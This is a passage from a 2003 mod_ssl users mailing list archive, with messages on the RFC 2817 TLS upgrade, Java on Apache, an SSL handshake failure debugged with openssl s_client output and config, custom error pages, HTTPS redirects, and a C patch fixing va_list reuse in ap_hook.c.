> it did make it into the tree, then it is more or less untested because
there
> are no clients for it.

Interesting answer. Thanks! I asked this because I need to write an
SSL-aware HTTP client.

Whatever, I am now wondering how strong is the pressure to migrate from the
classical "https" scheme to the "client requested upgrade" (as I see these
as somehow alternatives, as the client explicitely request "https"...). As
far as I understand, RFC 2817 (May 2000...) clearly states that things like
HTTPS should be deprecated. So I wonder what the "market" says... You say
there is no client: am I really going to write the first one that supports
this? As apache starts to support it, I guess there might be some other
people looking fot it also.



---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.516 / Virus Database: 313 - Release Date: 01/09/2003


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 12 19:21:16 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DEC38A8965; Fri, 12 Sep 2003 19:21:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from romeo.rtfm.com (romeo.rtfm.com [198.144.203.242])
	by master.modssl.org (Postfix) with ESMTP id 9679AA8933
	for ; Fri, 12 Sep 2003 19:21:14 +0200 (CEST)
Received: by romeo.rtfm.com (Postfix, from userid 556)
	id 07C20ABD2; Fri, 12 Sep 2003 10:28:28 -0700 (PDT)
To: modssl-users@modssl.org
Subject: Re: Are "client requested update" supported?
References: <003c01c37933$addb4fb0$010c010a@adrien>
	<20030912140029.GC16449@toftum.dk>
	<006201c37947$9354e840$010c010a@adrien>
From: Eric Rescorla 
Date: 12 Sep 2003 10:28:28 -0700
In-Reply-To: <006201c37947$9354e840$010c010a@adrien>
Message-ID: 
Lines: 16
User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.4 (Portable Code)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

"Adrien Felon"  writes:
> Whatever, I am now wondering how strong is the pressure to migrate from the
> classical "https" scheme to the "client requested upgrade" (as I see these
> as somehow alternatives, as the client explicitely request "https"...). As
> far as I understand, RFC 2817 (May 2000...) clearly states that things like
> HTTPS should be deprecated. So I wonder what the "market" says... You say
> there is no client: am I really going to write the first one that supports
> this? As apache starts to support it, I guess there might be some other
> people looking fot it also.
There's no pressure at all, and for good reason. RFC 2817 is
badly broken.

To take merely one example, it has a terrible interaction with
proxies.

-Ekr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 12 19:51:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1E259A8965; Fri, 12 Sep 2003 19:51:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 3E5B6A8933
	for ; Fri, 12 Sep 2003 19:51:03 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA16239
	for ; Fri, 12 Sep 2003 13:48:01 -0400
Date: Fri, 12 Sep 2003 13:47:54 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: apache java question
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I know this might be more suited to the apache users list, but, there's
enough knowledgebase here I'm sure to answer a question as I work a
project with deadlines looming and little time to deal with an additional
list to join and parse over for info.  The project I'm engaged in is a
migration from sun/solaris/iPlanet to a linux/apache realm, with
apache/linux doing that VM game on the s390 .  Now, though these
are and have always been deemed 'static' websites, and I have someplace
between 130-200 virtual sites to migrate, the concpet of static is a tad
different then the stanard view of 'static'.  Turns out many of my clients
are doing far more dynamic content then was  believed or understood till
we started to take a closer look at what functionality we needed to port
to apache to replace that clients have under iPlanet.  My clients are
doing a tad bit-o jave/jsp stuff.  So, my question are;

what at least minimal java capability is provided with plain ole pache
without adding in a tomcat or websphere component.

does the installation of the java sdk provide any basic or additional
functionality to plain ole apache.

	if  so, what kinda httpd.conf references do I need to provide to
	point to either a jre or java bin for  my clients to make use of?

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 15 00:38:07 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 861F8A8959; Mon, 15 Sep 2003 00:38:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailhub.Dartmouth.EDU (mailhub.dartmouth.edu [129.170.16.6])
	by master.modssl.org (Postfix) with ESMTP id CEC6DA8971
	for ; Mon, 15 Sep 2003 00:38:03 +0200 (CEST)
Received: from [129.170.92.33] (figment.dartmouth.edu [129.170.92.33])
	by mailhub.Dartmouth.EDU (8.9.3+DND/8.9.3) with ESMTP id SAA13587
	for ; Sun, 14 Sep 2003 18:38:01 -0400 (EDT)
User-Agent: Microsoft-Entourage/10.0.0.1309
Date: Sun, 14 Sep 2003 18:38:00 -0400
Subject: Handshake Failure, but it looks like SSL
From: Sam 
To: 
Message-ID: 
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sam 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all - 

I'm trying to get modssl working on a RedHat 8.0 box, which is running
modssl 2.0.40-11.7 and the apache httpd 2.0.40-11.7 (both from RPM).

There are several NBVH on port 80, and I one VirtualHost block set to port
443.

When I connect, I get the following:

$ openssl s_client -connect www.mydomain.com:443  -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 08161508 [08161550] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 7f 5f 29 d7   ............._).
0060 - eb 10 2c be a7 b8 42 b9-e5 86 7a b7 03 f0 e9 34   ..,...B...z....4
0070 - 47 04 1f 94 00 c4 83 c5-0a bb c5 d7               G...........
SSL_connect:SSLv2/v3 write client hello A
read from 08161508 [08166AB0] (7 bytes => 0 (0x0))
29523:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake
failure:s23_lib.c:226:
$ openssl s_client -connect localhost:443  -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 08160670 [08160A40] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 fc e7 8b 7d   ...............}
0060 - 38 97 d2 c0 73 10 26 93-6e 06 61 c2 84 cc dc 6f   8...s.&.n.a....o
0070 - fd d7 69 d9 e2 92 c1 55-e4 17 a0 a4               ..i....U....
SSL_connect:SSLv2/v3 write client hello A
read from 08160670 [08165FA0] (7 bytes => 0 (0x0))
29524:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake
failure:s23_lib.c:226:
$ openssl s_client -connect localhost:443  -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 08160670 [08160A40] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 ca 76 f2 09   .............v..
0060 - 0a c8 b1 ab 78 f3 c9 b3-a6 8d 34 4e 44 54 14 a5   ....x.....4NDT..
0070 - 2f 18 c0 7a 96 e4 21 c5-cd 90 b2 08               /..z..!.....
SSL_connect:SSLv2/v3 write client hello A
read from 08160670 [08165FA0] (7 bytes => 0 (0x0))
29525:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake
failure:s23_lib.c:226:

Note how they're different (slightly) and there's no human-readable text in
there.  In fact, when I connect to a working https server, I get a similar
result at the beginning.

($ openssl s_client -connect workingdomain.com:443  -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 08161508 [08161550] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 b3 30 11 07   .............0..
0060 - d2 7f 14 32 93 4d 4c 53-3c 5d 7d 30 d8 f0 91 a8   ...2.MLS<]}0....
0070 - 75 f6 41 b7 0c 69 58 7e-ac 6e 58 11               u.A..iX~.nX.
SSL_connect:SSLv2/v3 write client hello A
read from 08161508 [08166AB0] (7 bytes => 7 (0x7))
0000 - 16 03 01 00 4a 02                                 ....J.
0007 - 
)


If I turn OFF the SSLEngine, I get the following:

$ openssl s_client -connect localhost:443 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 08160670 [08160A40] (124 bytes => 124 (0x7C))
0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
0050 - 00 00 06 00 00 03 04 00-80 02 00 80 1a 3b 1f c0   .............;..
0060 - 17 07 46 3e 56 6a cd ea-f4 8f b0 31 0c a1 e6 66   ..F>Vj.....1...f
0070 - ae c7 df 2b 80 af ca e1-98 db 3d 9d               ...+......=.
SSL_connect:SSLv2/v3 write client hello A
read from 08160670 [08165FA0] (7 bytes => 7 (0x7))
0000 - 0a 3c 3f 78 6d 6c                                 .
SSL_connect:error in SSLv2/v3 read server hello A
28895:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
protocol:s23_clnt.c:460:

A different error, and you can see the beginning of the document peeking
through (
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(1005):
+-------------------------------------------------------------------------+
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(1027): OpenSSL: read
113/113 bytes from BIO#bogus %p[mem: bogus %p !!!@`!!@!!?!!
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(974):
+-------------------------------------------------------------------------+
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0000: 00 00 16 00
00 13 00 00-0a 07 00 c0 00 00 66 00  ..............f. |
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0010: 00 05 00 00
04 03 00 80-01 00 80 08 00 80 00 00  ................ |
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0020: 65 00 00 64
00 00 63 00-00 62 00 00 61 00 00 60  e..d..c..b..a..` |
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0030: 00 00 15 00
00 12 00 00-09 06 00 40 00 00 14 00  ...........@.... |
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0040: 00 11 00 00
08 00 00 06-00 00 03 04 00 80 02 00  ................ |
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0050: 80 7f 5f 29
d7 eb 10 2c-be a7 b8 42 b9 e5 86 7a  .._)...,...B...z |
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0060: b7 03 f0 e9
34 47 04 1f-94 00 c4 83 c5 0a bb c5  ....4G.......... |
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0070: d7
.                |
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(1005):
+-------------------------------------------------------------------------+
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1854): OpenSSL: Loop:
SSLv3 read client hello A
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1854): OpenSSL: Loop:
SSLv3 write server hello A
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1854): OpenSSL: Loop:
SSLv3 write certificate A
[Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1248): handing out
temporary 1024 bit DH key



Then the child segfaults, the browser complains of a dropped connection.


httpd.conf has:

NameVirtualHost xxx.xxx.xxx.xxx


ServerAdmin email@domain.com
ServerName www.domain.com
DocumentRoot /var/www/html
Include "/etc/httpd/conf/redirects.include.conf"



ServerName subdomain.domain.com
DocumentRoot /home/subdomain/

(repeat a few times with different subdomains)

ssl.conf, included above that, includes


LoadModule ssl_module modules/mod_ssl.so
Listen 443
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl
SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:/var/cache/mod_ssl/scache
SSLSessionCacheTimeout  300
SSLMutex  file:logs/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

    #  #this didn't help
    DocumentRoot /var/www/html
    ServerName www.domain.com:443
    ServerAdmin email@domain.com
    ErrorLog logs/ssl_error_log
    TransferLog logs/ssl_access_log
    LogLevel debug
    #SSLEngine off 
    SSLEngine on
    SSLCipherSuite 
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:-SSLv2:+EXP:+eNULL
    SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
    SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
    
        SSLOptions +StdEnvVars
        
    
        SSLOptions +StdEnvVars
    
    
        SSLOptions +StdEnvVars +OptRenegotiate
    
    SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
    CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
     



So the big question is, does this ring a bell with anyone?  Seen something
like this before?  Any suggestions?  Am I missing something? I've been
around in circles on this one, I'm afraid.

Thanks in advance

Sam

---
Humans do it better


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 15 08:16:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A0655A8971; Mon, 15 Sep 2003 08:16:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.eer.ee (ns.eer.ee [195.80.103.28])
	by master.modssl.org (Postfix) with ESMTP id 1F1EFA8936
	for ; Mon, 15 Sep 2003 08:16:06 +0200 (CEST)
Received: from fw.eer.ee (dmz.eer.ee [195.80.103.25])
	by mail.eer.ee (8.12.5/8.12.5) with SMTP id h8F6G8pw011053
	for ; Mon, 15 Sep 2003 09:16:08 +0300
Received: Stripped by FW-1
Received: Stripped by FW-1
Message-ID: <001401c37b50$d372c4a0$023c64ac@erkilaptop>
From: "Erki Kriks" 
To: 
References: <003c01c37933$addb4fb0$010c010a@adrien>
Subject: SSL error message
Date: Mon, 15 Sep 2003 09:15:56 +0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Erki Kriks" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!

My users are using ID card for authentification.
If the ID card is missing or password is wrong,
users gets default msie errorpage "The page cannot be displayed".

I have declared all error messages in Apache conf file (errordocs a.s.o)
but it did not help.

How can i show for users some my own error page (for example, "Please insert
your ID card!")?

Apache SSL error.log is:
[Thu Sep 11 12:23:37 2003] [error] OpenSSL: error:140890C7:SSL
routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
[Hint: No CAs known to server for verification?]
[Thu Sep 11 12:23:37 2003] [error] mod_ssl: SSL handshake failed (server
erki_laptop/laev:443, client 172.100.60.2) (OpenSSL library error follows)

I'm using WinXP, OpenSA, Apache 1.3.7, OpenSSL 0.9.6b, Tomcat 4.1.

Tnx,
Erki

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 22 12:06:29 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1D85FA8943; Mon, 22 Sep 2003 12:06:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cwb.pacific.net.hk (cwb.pacific.net.hk [202.14.67.92])
	by master.modssl.org (Postfix) with ESMTP id 28DF0A8936
	for ; Mon, 22 Sep 2003 12:06:07 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by cwb.pacific.net.hk with SMTP
        id h8MA62NX009618 for ; Mon, 22 Sep 2003 18:06:04 +0800 (CST)
Message-ID: <004101c380f0$e8e16da0$0200a8c0@com>
From: "Arthur Chan" 
To: 
Subject: Re-direct in vhost
Date: Mon, 22 Sep 2003 18:04:25 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all.
Currently I've one vhost on Port 443 and while others listen on Port 80.
I would like to test the scenario of putting *everything* on openSSL ie
listening on Port 443.
Do I assume right that all I need is a "redirect" from the Port 80 vhost to
Port 443 ?
TIA :-)

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 24 11:38:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4113AA8959; Wed, 24 Sep 2003 11:38:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from stapler-internal.kaolin.hn.org (ppp187-164.lns1.bne1.internode.on.net [150.101.187.164])
	by master.modssl.org (Postfix) with ESMTP id 1D96CA8936
	for ; Wed, 24 Sep 2003 11:38:29 +0200 (CEST)
Received: from jonathan by stapler-internal.kaolin.hn.org with local (Exim 3.36 #1 (Debian))
	id 1A267B-0000tO-00
	for ; Wed, 24 Sep 2003 19:39:17 +1000
Date: Wed, 24 Sep 2003 19:39:17 +1000
To: modssl-users@modssl.org
Subject: va_list reuse in ap_hook.c
Message-ID: <20030924093917.GA3406@kaolin.hn.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Represent-the-Ocean: Yes
User-Agent: Mutt/1.5.4i
From: Jonathan Matthew 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jonathan Matthew 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi,

While working on a particularly nasty module, I discovered a few bugs in
ap_hook.c relating to reuse of va_lists.  On some platforms, va_lists
cannot be reused in mulitple function calls.  For example, this:

void e(va_list f, int g);

void a(int b, ...)
{
    va_list c;
    int d;
    va_start(c, b);
     
    for (d=0; d<4; d++) {
        e(c, d);
    }
    va_end(c);
}

is unsafe - on some platforms, calls to va_arg in the second call to e()
will not return arguments starting with the argument after 'b'.
Instead, va_arg will return garbage.  The only such platform I know of 
at the moment is s390 Linux, but there are probably others.

Anyway, here's a patch to mod_ssl 2.8.15 that fixes ap_hook_call() and
ap_hook_use().  I've simply moved all the code that calls va_ functions 
inside the for(hooks) loops in those functions.  I haven't checked for
other instances of va_list reuse in mod_ssl, but my guess is someone
would have noticed by now if they were anywhere less obscure than these.

You probably don't want to know what I'm doing to make this problem
show up.

-jonathan.

--- pkg.eapi/ap_hook.c  2003-09-24 17:23:59.000000000 +1000
+++ pkg.eapi/ap_hook.c  2003-09-24 18:15:32.000000000 +1000
@@ -314,23 +314,6 @@
     va_list ap;
     int rc;
 
-    va_start(ap, modeid);
-
-    if (modeid == AP_HOOK_MODE_DECLINE || modeid == AP_HOOK_MODE_DECLTMP) {
-        if (AP_HOOK_SIG_HAS(sig, RC, char))
-            modeval.v_char = va_arg(ap, va_type(char));
-        else if (AP_HOOK_SIG_HAS(sig, RC, int))
-            modeval.v_int = va_arg(ap, va_type(int));
-        else if (AP_HOOK_SIG_HAS(sig, RC, long))
-            modeval.v_long = va_arg(ap, va_type(long));
-        else if (AP_HOOK_SIG_HAS(sig, RC, float))
-            modeval.v_float = va_arg(ap, va_type(float));
-        else if (AP_HOOK_SIG_HAS(sig, RC, double))
-            modeval.v_double = va_arg(ap, va_type(double));
-        else if (AP_HOOK_SIG_HAS(sig, RC, ptr))
-            modeval.v_ptr = va_arg(ap, va_type(ptr));
-    }
-
     if ((he = ap_hook_create(hook)) == NULL)
         return FALSE;
 
@@ -341,9 +324,29 @@
         he->he_modeval = modeval;
     }
 
-    for (i = 0; he->he_func[i] != NULL; i++)
-        if (ap_hook_call_func(ap, he, he->he_func[i]))
+    for (i = 0; he->he_func[i] != NULL; i++) {
+        va_start(ap, modeid);
+
+        if (modeid == AP_HOOK_MODE_DECLINE || modeid == AP_HOOK_MODE_DECLTMP) {
+            if (AP_HOOK_SIG_HAS(sig, RC, char))
+                modeval.v_char = va_arg(ap, va_type(char));
+            else if (AP_HOOK_SIG_HAS(sig, RC, int))
+                modeval.v_int = va_arg(ap, va_type(int));
+            else if (AP_HOOK_SIG_HAS(sig, RC, long))
+                modeval.v_long = va_arg(ap, va_type(long));
+            else if (AP_HOOK_SIG_HAS(sig, RC, float))
+                modeval.v_float = va_arg(ap, va_type(float));
+            else if (AP_HOOK_SIG_HAS(sig, RC, double))
+                modeval.v_double = va_arg(ap, va_type(double));
+            else if (AP_HOOK_SIG_HAS(sig, RC, ptr))
+                modeval.v_ptr = va_arg(ap, va_type(ptr));
+        }
+        if (ap_hook_call_func(ap, he, he->he_func[i])) {
+            va_end(ap);
             break;
+        }
+        va_end(ap);
+    }
 
     if (i > 0 && he->he_modeid == AP_HOOK_MODE_ALL)
         rc = TRUE;
@@ -352,7 +355,6 @@
     else
         rc = TRUE;
 
-    va_end(ap);
     return rc;
 }
 
@@ -366,21 +368,23 @@
     va_list ap;
     int rc;
     
-    va_start(ap, hook);
-
     if ((he = ap_hook_find(hook)) == NULL) {
-        va_end(ap);
         return FALSE;
     }
     if (   he->he_sig == AP_HOOK_SIG_UNKNOWN
         || he->he_modeid == AP_HOOK_MODE_UNKNOWN) {
-        va_end(ap);
         return FALSE;
     }
 
-    for (i = 0; he->he_func[i] != NULL; i++)
-        if (ap_hook_call_func(ap, he, he->he_func[i]))
+    for (i = 0; he->he_func[i] != NULL; i++) {
+        va_start(ap, hook);
+        if (ap_hook_call_func(ap, he, he->he_func[i])) {
+            va_end(ap);
             break;
+        }
+        va_end(ap);
+    }
+
 
     if (i > 0 && he->he_modeid == AP_HOOK_MODE_ALL)
         rc = TRUE;
@@ -389,7 +393,6 @@
     else
         rc = TRUE;
 
-    va_end(ap);
     return rc;
 }

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 24 18:02:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B7091A8959; Wed, 24 Sep 2003 18:02:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail4.hitachi.co.jp (mail4.hitachi.co.jp [133.145.228.5])
	by master.modssl.org (Postfix) with ESMTP id 6AFC5A8936
	for ; Wed, 24 Sep 2003 18:02:27 +0200 (CEST)
Received: from mc1.mcg.hitachi.co.jp by mail4.hitachi.co.jp (8.9.3p2/3.7W-mail4) id BAA19353; Thu, 25 Sep 2003 01:02:03 +0900 (JST)
Received: (from root@localhost)
	by mc1.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h8OG22v21933
	for ; Thu, 25 Sep 2003 01:02:02 +0900 (JST)
Received: from unknown [192.168.2.1] by mc1.mcg.hitachi.co.jp with SMTP id BAA21929 ; Thu, 25 Sep 2003 01:02:02 +0900
Received: from navsg4.hitachi.co.jp by navsg4.hitachi.co.jp (8.9.3/3.7W-navsg4) id BAA23061; Thu, 25 Sep 2003 01:02:01 +0900 (JST)
Received: from mlsv5.itg.hitachi.co.jp ([158.213.165.104])
 by navsg4.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003092501020131454
 ; Thu, 25 Sep 2003 01:02:01 +0900
Received: from navgw5.itg.hitachi.co.jp by mlsv5.itg.hitachi.co.jp (8.12.6/8.12.6) id h8OG21YM014085; Thu, 25 Sep 2003 01:02:01 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw5.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003092501013732063
 ; Thu, 25 Sep 2003 01:01:37 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id BAA24425;
	Thu, 25 Sep 2003 01:02:01 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h8OG20748841;
	Thu, 25 Sep 2003 01:02:00 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Thu, 25 Sep 2003 01:00:36 +0900 (JST)
Message-Id: <20030925.010036.74713489.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, erkik@eer.ee
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: SSL error message
From: Kiyoshi Watanabe 
In-Reply-To: <001401c37b50$d372c4a0$023c64ac@erkilaptop>
References: <003c01c37933$addb4fb0$010c010a@adrien>
	<001401c37b50$d372c4a0$023c64ac@erkilaptop>
